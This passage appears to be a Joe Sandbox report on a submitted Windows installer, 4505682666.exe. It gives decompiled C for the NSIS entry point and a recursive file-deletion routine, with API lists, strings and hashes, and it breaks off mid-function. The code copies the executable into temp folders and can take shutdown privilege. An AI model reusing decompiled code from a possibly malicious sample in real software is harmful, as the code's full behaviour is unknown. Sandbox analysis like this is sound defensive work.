4038aa-4038ae 88->90 96 4038b0-4038b5 90->96 97 4038b7-4038bf 90->97 91->63 108 4038e6-4038fc call 406507 * 2 91->108 106 403934-40394e lstrcatW lstrcmpiW 92->106 107 403929-40392f lstrcatW 92->107 94->78 100 403abf-403ac1 call 40140b 94->100 95->94 95->100 96->97 101 4038c1 96->101 97->90 97->101 100->78 101->87 109 403a21 106->109 110 403954-403957 106->110 107->106 108->69 109->63 112 403960 call 405ab5 110->112 113 403959-40395e call 405a38 110->113 118 403965-403975 SetCurrentDirectoryW 112->118 113->118 121 403982-4039ae call 406507 118->121 122 403977-40397d call 406507 118->122 126 4039b3-4039ce call 406544 DeleteFileW 121->126 122->121 129 4039d0-4039e0 CopyFileW 126->129 130 403a0e-403a18 126->130 129->130 132 4039e2-403a02 call 4062c7 call 406544 call 405aea 129->132 130->126 131 403a1a-403a1c call 4062c7 130->131 131->109 132->130 140 403a04-403a0b CloseHandle 132->140 140->130
                                  C-Code - Quality: 78%
                                  			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a2d8 = _v324.dwBuildNumber;
				 *0x42a2dc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a2de != 0x600) {
					_t179 = E004068D4(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E00406864(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E004068D4(0xb);
				 *0x42a224 = E004068D4(9);
				_t88 = E004068D4(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a2dc =  *0x42a2dc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a2e0 = _t88;
				SHGetFileInfoW(0x4216c8, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406507(0x429220, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\hardz\\Desktop\\4505682666.exe\" ";
				E00406507(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a220 = 0x400000;
				_t250 = L"\"C:\\Users\\hardz\\Desktop\\4505682666.exe\" " - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405E03(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405E03(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406507(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E004034C6(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2b4 == _t188) {
														L77:
														_t119 =  *0x42a2cc;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E004068D4(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B67(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a23c == _t188) {
												L51:
												 *0x42a2cc =  *0x42a2cc | 0xffffffff;
												_v24 = E00403BB6(_t264);
												goto L68;
											}
											_t218 = E00405E03(L"\"C:\\Users\\hardz\\Desktop\\4505682666.exe\" ", _t188);
											if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\4505682666.exe\" ") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\hardz\\Desktop\\4505682666.exe\" ";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\4505682666.exe\" ") {
													_t189 = E00405AD2(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t137 = lstrcmpiW(_t234, 0x436800);
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405AB5();
														} else {
															E00405A38();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406507(L"C:\\Users\\hardz\\AppData\\Local\\Temp", 0x436800);
														}
														E00406507(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E00406544(0, 0x420ec8, _t234, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x120)));
															DeleteFileW(0x420ec8);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\4505682666.exe", 0x420ec8, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E004062C7(_t201, 0x420ec8, 0);
																	E00406544(0, 0x420ec8, _t234, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x124)));
																	_t152 = E00405AEA(0x420ec8);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062C7(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E00405EDE(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406507(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
												E00406507(0x436000, _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\hardz\\Desktop\\4505682666.exe\" ") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E004034C6(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E004034C6(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a2c0 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                                  0x00403505
                                  0x00403506
                                  0x0040350d
                                  0x00403510
                                  0x00403517
                                  0x0040351a
                                  0x0040352d
                                  0x00403533
                                  0x00403536
                                  0x00403539
                                  0x00403547
                                  0x0040354f
                                  0x0040355a
                                  0x00403573
                                  0x00403575
                                  0x0040357d
                                  0x0040357d
                                  0x00403588
                                  0x0040358a
                                  0x0040358a
                                  0x0040359f
                                  0x004035c4
                                  0x004035d2
                                  0x004035d5
                                  0x004035dc
                                  0x004035e3
                                  0x004035e3
                                  0x004035dc
                                  0x004035e5
                                  0x004035ea
                                  0x004035eb
                                  0x004035f7
                                  0x004035fb
                                  0x00403602
                                  0x00403610
                                  0x00403615
                                  0x0040361c
                                  0x00403620
                                  0x00403624
                                  0x00403626
                                  0x00403626
                                  0x00403624
                                  0x0040362d
                                  0x00403634
                                  0x0040363a
                                  0x00403652
                                  0x00403662
                                  0x00403667
                                  0x0040366d
                                  0x00403674
                                  0x0040367b
                                  0x0040367d
                                  0x0040367e
                                  0x00403688
                                  0x0040368f
                                  0x00403691
                                  0x00403693
                                  0x00403693
                                  0x004036a6
                                  0x004036a8
                                  0x004037a2
                                  0x004037a2
                                  0x004037a5
                                  0x004037a8
                                  0x00000000
                                  0x00000000
                                  0x004036b2
                                  0x004036b3
                                  0x004036b6
                                  0x004036bf
                                  0x004036bf
                                  0x004036c2
                                  0x004036c5
                                  0x004036c8
                                  0x004036cb
                                  0x004036cb
                                  0x004036cb
                                  0x004036cc
                                  0x004036d0
                                  0x00403790
                                  0x00403799
                                  0x0040379b
                                  0x0040379e
                                  0x004037a1
                                  0x004037a1
                                  0x004037a1
                                  0x00000000
                                  0x004036d6
                                  0x004036d7
                                  0x004036d8
                                  0x004036dc
                                  0x004036f6
                                  0x004036fd
                                  0x00403710
                                  0x00403711
                                  0x00403726
                                  0x0040372b
                                  0x0040372d
                                  0x0040372f
                                  0x0040374b
                                  0x00403752
                                  0x00403765
                                  0x00403766
                                  0x0040377b
                                  0x00403781
                                  0x00403783
                                  0x00403785
                                  0x0040378d
                                  0x0040378f
                                  0x00000000
                                  0x0040378f
                                  0x00403789
                                  0x0040378b
                                  0x004037b0
                                  0x004037b4
                                  0x004037bd
                                  0x004037c2
                                  0x004037c8
                                  0x004037d3
                                  0x004037d5
                                  0x004037da
                                  0x004037dc
                                  0x00403834
                                  0x00403839
                                  0x00403842
                                  0x00403849
                                  0x0040384c
                                  0x00403a23
                                  0x00403a23
                                  0x00403a28
                                  0x00403a31
                                  0x00403a4e
                                  0x00403ac6
                                  0x00403ac6
                                  0x00403ace
                                  0x00403ad0
                                  0x00403ad0
                                  0x00403ad6
                                  0x00403ad6
                                  0x00403a65
                                  0x00403a71
                                  0x00403a82
                                  0x00403a89
                                  0x00403a90
                                  0x00403a90
                                  0x00403a98
                                  0x00403aa4
                                  0x00403ab2
                                  0x00403abd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403aa6
                                  0x00403aa6
                                  0x00403aa7
                                  0x00403aa9
                                  0x00403aaa
                                  0x00403aab
                                  0x00403ab0
                                  0x00403abf
                                  0x00403ac1
                                  0x00000000
                                  0x00403ac1
                                  0x00000000
                                  0x00403ab0
                                  0x00403aa4
                                  0x00403a3b
                                  0x00403a42
                                  0x00403a42
                                  0x00403858
                                  0x004038ff
                                  0x004038ff
                                  0x0040390b
                                  0x00000000
                                  0x0040390b
                                  0x00403869
                                  0x00403871
                                  0x004038c3
                                  0x004038c3
                                  0x004038c9
                                  0x004038d0
                                  0x0040391e
                                  0x00403920
                                  0x00403925
                                  0x00403927
                                  0x0040392f
                                  0x0040392f
                                  0x0040393a
                                  0x00403946
                                  0x0040394c
                                  0x0040394e
                                  0x00403a21
                                  0x00403a21
                                  0x00403a21
                                  0x00000000
                                  0x00403954
                                  0x00403954
                                  0x00403956
                                  0x00403957
                                  0x00403960
                                  0x00403959
                                  0x00403959
                                  0x00403959
                                  0x00403966
                                  0x0040396e
                                  0x00403975
                                  0x0040397d
                                  0x0040397d
                                  0x0040398a
                                  0x00403996
                                  0x004039a0
                                  0x004039a0
                                  0x004039a2
                                  0x004039a9
                                  0x004039b3
                                  0x004039bf
                                  0x004039c5
                                  0x004039cb
                                  0x004039ce
                                  0x004039d8
                                  0x004039de
                                  0x004039e0
                                  0x004039e4
                                  0x004039f5
                                  0x004039fb
                                  0x00403a00
                                  0x00403a02
                                  0x00403a05
                                  0x00403a0b
                                  0x00403a0b
                                  0x00403a02
                                  0x004039e0
                                  0x00403a0e
                                  0x00403a15
                                  0x00403a15
                                  0x00403a15
                                  0x00403a15
                                  0x00403a1c
                                  0x00000000
                                  0x00403a1c
                                  0x0040394e
                                  0x004038d2
                                  0x004038d5
                                  0x004038d9
                                  0x004038de
                                  0x004038e0
                                  0x00000000
                                  0x00000000
                                  0x004038ec
                                  0x004038f7
                                  0x004038fc
                                  0x00000000
                                  0x004038fc
                                  0x0040387a
                                  0x00403892
                                  0x004038a3
                                  0x004038a4
                                  0x004038a8
                                  0x004038aa
                                  0x004038b8
                                  0x004038bf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004038bf
                                  0x004038c1
                                  0x00000000
                                  0x004038c1
                                  0x004037e4
                                  0x004037f0
                                  0x004037f5
                                  0x004037fa
                                  0x004037fc
                                  0x00000000
                                  0x00000000
                                  0x00403804
                                  0x0040380c
                                  0x0040381d
                                  0x00403825
                                  0x00403827
                                  0x0040382c
                                  0x0040382e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040382e
                                  0x00000000
                                  0x0040378b
                                  0x00403734
                                  0x00403736
                                  0x00000000
                                  0x00000000
                                  0x00403738
                                  0x0040373c
                                  0x00403740
                                  0x00403747
                                  0x00403747
                                  0x00403747
                                  0x00403747
                                  0x00000000
                                  0x00403747
                                  0x00403742
                                  0x00403745
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403745
                                  0x004036de
                                  0x004036e2
                                  0x004036e5
                                  0x004036ec
                                  0x004036ec
                                  0x00000000
                                  0x004036ec
                                  0x004036e7
                                  0x004036ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004036ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004036b8
                                  0x004036b8
                                  0x004036b9
                                  0x004036ba
                                  0x004036ba
                                  0x00000000
                                  0x004036b8
                                  0x00000000

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008001), ref: 0040351A
                                  • GetVersionExW.KERNEL32(?), ref: 00403543
                                  • GetVersionExW.KERNEL32(0000011C), ref: 0040355A
                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
                                  • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
                                  • OleInitialize.OLE32(00000000), ref: 00403634
                                  • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
                                  • GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\4505682666.exe" ,00000020,"C:\Users\user\Desktop\4505682666.exe" ,00000000), ref: 004036A0
                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
                                  • DeleteFileW.KERNELBASE(1033), ref: 00403839
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403920
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040392F
                                    • Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040393A
                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\4505682666.exe" ,00000000,?), ref: 00403946
                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
                                  • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\4505682666.exe,00420EC8,00000001), ref: 004039D8
                                  • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
                                  • ExitProcess.KERNEL32(?), ref: 00403A23
                                  • OleUninitialize.OLE32(?), ref: 00403A28
                                  • ExitProcess.KERNEL32 ref: 00403A42
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
                                  • ExitProcess.KERNEL32 ref: 00403AD6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                  • String ID: "C:\Users\user\Desktop\4505682666.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\4505682666.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                  • API String ID: 2292928366-3132891569
                                  • Opcode ID: 0f3df21176a0be8cd9ff5477b57629174c4823c088433172f8501f5a44e58711
                                  • Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
                                  • Opcode Fuzzy Hash: 0f3df21176a0be8cd9ff5477b57629174c4823c088433172f8501f5a44e58711
                                  • Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405C13 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148filestringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 388 405c13-405c39 call 405ede 391 405c52-405c59 388->391 392 405c3b-405c4d DeleteFileW 388->392 394 405c5b-405c5d 391->394 395 405c6c-405c7c call 406507 391->395 393 405dcf-405dd3 392->393 396 405c63-405c66 394->396 397 405d7d-405d82 394->397 401 405c8b-405c8c call 405e22 395->401 402 405c7e-405c89 lstrcatW 395->402 396->395 396->397 397->393 400 405d84-405d87 397->400 403 405d91-405d99 call 40683d 400->403 404 405d89-405d8f 400->404 405 405c91-405c95 401->405 402->405 403->393 412 405d9b-405daf call 405dd6 call 405bcb 403->412 404->393 408 405ca1-405ca7 lstrcatW 405->408 409 405c97-405c9f 405->409 411 405cac-405cc8 lstrlenW FindFirstFileW 408->411 409->408 409->411 413 405d72-405d76 411->413 414 405cce-405cd6 411->414 428 405db1-405db4 412->428 429 405dc7-405dca call 405569 412->429 413->397 416 405d78 413->416 417 405cf6-405d0a call 406507 414->417 418 405cd8-405ce0 414->418 416->397 430 405d21-405d2c call 405bcb 417->430 431 405d0c-405d14 417->431 421 405ce2-405cea 418->421 422 405d55-405d65 FindNextFileW 418->422 421->417 427 405cec-405cf4 421->427 422->414 426 405d6b-405d6c FindClose 422->426 426->413 427->417 427->422 428->404 432 405db6-405dc5 call 405569 call 4062c7 428->432 429->393 441 405d4d-405d50 call 405569 430->441 442 405d2e-405d31 430->442 431->422 433 405d16-405d1f call 405c13 431->433 432->393 433->422 441->422 445 405d33-405d43 call 405569 call 4062c7 442->445 446 405d45-405d4b 442->446 445->422 446->422
                                  C-Code - Quality: 98%
                                  			E00405C13(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405EDE(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2a8 =  *0x42a2a8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406507(0x425710, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E22(_t68);
					} else {
						lstrcatW(0x425710, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425710,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406507(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405BCB(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405569(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2a8 =  *0x42a2a8 + 1;
										} else {
											E00405569(0xfffffff1, _t68);
											E004062C7(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C13(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425710 - 0x5c;
					if( *0x425710 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040683D(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405DD6(_t68);
							_t38 = E00405BCB(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405569(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
